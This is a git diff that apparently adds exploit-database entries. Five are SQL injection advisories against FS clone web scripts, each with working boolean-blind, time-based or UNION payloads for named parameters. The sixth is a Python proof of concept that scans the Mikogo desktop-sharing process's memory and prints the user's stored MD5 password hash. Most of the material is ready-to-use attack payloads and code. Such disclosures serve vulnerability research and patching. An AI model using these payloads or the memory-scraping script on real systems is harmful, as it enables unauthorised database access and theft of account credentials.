[https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/43040.txt b/platforms/php/webapps/43040.txt new file mode 100755 index 000000000..3332b26eb --- /dev/null +++ b/platforms/php/webapps/43040.txt @@ -0,0 +1,40 @@ +# Exploit Title: FS Freelancer Clone - SQL Injection +# Date: 2017-10-23 +# Exploit Author: 8bitsec +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/freelancer-clone/ +# Version: 23 October 17 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-10-23 + +Product & Service Introduction: +=============================== +Launching within minutes the best ever reverse auction website available online is no more a distant dream! + +Technical Details & Description: +================================ + +SQL injection on [sk] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +https://localhost/[path]/category.php?sk=2 AND 5895=5895 + +Parameter: sk (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: sk=2 AND 5895=5895 + + Type: UNION query + Title: Generic UNION query (NULL) - 4 columns + Payload: sk=-9224 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627071,0x6a5954706679724662715071764b6f6b6b5448677770526873556c726b747079556b5341516d7559,0x716a627a71),NULL-- Pddp +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/43041.txt b/platforms/php/webapps/43041.txt new file mode 100755 index 000000000..699c37c1c --- /dev/null +++ b/platforms/php/webapps/43041.txt @@ -0,0 +1,40 @@ +# Exploit Title: FS Groupon Clone - SQL Injection +# Date: 2017-10-23 +# Exploit Author: 8bitsec +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/groupon-clone/ +# Version: 23 October 17 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-10-23 + +Product & Service Introduction: +=============================== +Developed in PHP/MySQL, the script is a perfect solution for a daily deal software with utmost versatility. + +Technical Details & Description: +================================ + +SQL injection on [category] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +https://localhost/[path]/search_product.php?category=1 AND 8132=8132&name=xxxxx + +Parameter: category (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: category=1 AND 8132=8132&name=xxxxx + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: category=1 AND SLEEP(5)&name=xxxxx +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/43042.txt b/platforms/php/webapps/43042.txt new file mode 100755 index 000000000..be2250d69 --- /dev/null +++ b/platforms/php/webapps/43042.txt @@ -0,0 +1,36 @@ +# Exploit Title: FS Indiamart Clone - SQL Injection +# Date: 2017-10-23 +# Exploit Author: 8bitsec +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/indiamart-clone/ +# Version: 23 October 17 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-10-23 + +Product & Service Introduction: +=============================== +The most favored web solution for webmasters aspiring to launch B2B Portals at minimum investment of time, money and effort. + +Technical Details & Description: +================================ + +SQL injection on [keywords] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +https://localhost/[path]/search.php?keywords=product') UNION ALL SELECT NULL,CONCAT(0x716b787071,0x506961776c6f79515068694b454e736668707675627448527949566e434472706a72624a466a5468,0x7171627171)-- LEhA&rctyp=Products + +Parameter: keywords (GET) + Type: UNION query + Title: Generic UNION query (NULL) - 2 columns + Payload: keywords=product') UNION ALL SELECT NULL,CONCAT(0x716b787071,0x506961776c6f79515068694b454e736668707675627448527949566e434472706a72624a466a5468,0x7171627171)-- LEhA&rctyp=Products +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/43043.txt b/platforms/php/webapps/43043.txt new file mode 100755 index 000000000..c106058b6 --- /dev/null +++ b/platforms/php/webapps/43043.txt @@ -0,0 +1,39 @@ +# Exploit Title: FS Lynda Clone - SQL Injection +# Date: 2017-10-23 +# Exploit Author: 8bitsec +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/lynda-clone/ +# Version: 23 October 17 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-10-23 + +Product & Service Introduction: +=============================== +It was never this easy to launch a video tutorial website similar to Lynda. + +Technical Details & Description: +================================ + +SQL injection on [category] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +https://localhost/[path]/tutorial/ + +Parameter: category (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: category=5 AND 1845=1845&keywords=xxxxx + +================== +8bitsec - [https://twitter.com/_8bitsec] + + diff --git a/platforms/php/webapps/43044.txt b/platforms/php/webapps/43044.txt new file mode 100755 index 000000000..7ab3d2a37 --- /dev/null +++ b/platforms/php/webapps/43044.txt @@ -0,0 +1,37 @@ +# Exploit Title: FS OLX Clone - SQL Injection +# Date: 2017-10-23 +# Exploit Author: 8bitsec +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/olx-clone/ +# Version: 23 October 17 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-10-23 + +Product & Service Introduction: +=============================== +The best performing Classifieds software ever known. + +Technical Details & Description: +================================ + +SQL injection on [catg_id] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +https://localhost/[path]/search-result.php?searchbox=search&catg_id=5' AND 4453=4453 AND 'QlZa'='QlZa + +Parameter: catg_id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: searchbox=search&catg_id=5' AND 4453=4453 AND 'QlZa'='QlZa + +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/windows/local/43033.py b/platforms/windows/local/43033.py new file mode 100755 index 000000000..3f8bde8aa --- /dev/null +++ b/platforms/windows/local/43033.py @@ -0,0 +1,103 @@ +#!/usr/bin/env python +# +# +# Mikogo 5.4.1.160608 Local Credentials Disclosure +# +# +# Vendor: Snapview GmbH +# Product web page: https://www.mikogo.com +# Affected version: 5.4.1.160608 +# +# Summary: Mikogo is a desktop sharing software application for +# web conferencing and remote support, and is provided by the online +# collaboration provider, BeamYourScreen GmbH. Mikogo provides +# its software as native downloads for Windows, Mac OS X, Linux, +# iOS and Android. +# +# Desc: Mikogo is vulnerable to local credentials disclosure, the +# supplied password is stored as a MD5 hash format in memory process. +# A potential attacker could reveal the supplied password hash and +# re-use it or store it via the configuration file in order to gain +# access to the account. +# +# ------------------------------------------------------------------ +# +# 0:017> s -a 0 L?80000000 "password=" +# 0125cdad 70 61 73 73 77 6f 72 64-3d 00 00 26 6c 61 6e 67 password=..&lang +# 0146e6b8 70 61 73 73 77 6f 72 64-3d 00 00 00 64 6f 6d 61 password=...doma +# 06a422b3 70 61 73 73 77 6f 72 64-3d 34 42 33 42 38 37 34 password=482C811 +# 0:017> da 06a422b3 +# 06a422b3 "password=482C811DA5D5B4BC6D497FF" +# 06a422d3 "A98491E38...." +# +# ... +# ... +# +# C:\Users\Charlie\Desktop>python mikogo_mem.py +# [~] Searching for pid by process name 'Mikogo-host.exe'.. +# [+] Found process with pid #1116 +# [~] Trying to read memory for pid #1116 +# [+] Credentials found! +# ---------------------------------------- +# [+] MD5 Password: 482C811DA5D5B4BC6D497FFA98491E38 +# +# ------------------------------------------------------------------ +# +# Tested on: Microsoft Windows 7 Professional SP1 (EN) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2017-5439 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5439.php +# +# +# 03.07.2017 +# +# +# Based on Yakir Wizman's PoC: +# + + +import time +import urllib +from winappdbg import Debug, Process + +username = '' +password = '' +found = 0 +filename = "Mikogo-host.exe" +process_pid = 0 +memory_dump = [] + +debug = Debug() +try: + print "[~] Searching for pid by process name '%s'.." % (filename) + time.sleep(1) + debug.system.scan_processes() + for (process, process_name) in debug.system.find_processes_by_filename(filename): + process_pid = process.get_pid() + if process_pid is not 0: + print "[+] Found process with pid #%d" % (process_pid) + time.sleep(1) + print "[~] Trying to read memory for pid #%d" % (process_pid) + + process = Process(process_pid) + for address in process.search_bytes('\x0a\x70\x61\x73\x73\x77\x6f\x72\x64\x3d'): + memory_dump.append(process.read(address,42)) + for i in range(len(memory_dump)): + password = memory_dump[i].split('password=')[1] + if password !='': + found = 1 + print "[+] Credentials found!\r\n----------------------------------------" + print "[+] MD5 Password: %s" % password + if found == 0: + print "[-] Credentials not found! Make sure the client is connected." + else: + print "[-] No process found with name '%s'." % (filename) + + debug.loop() +finally: + debug.stop()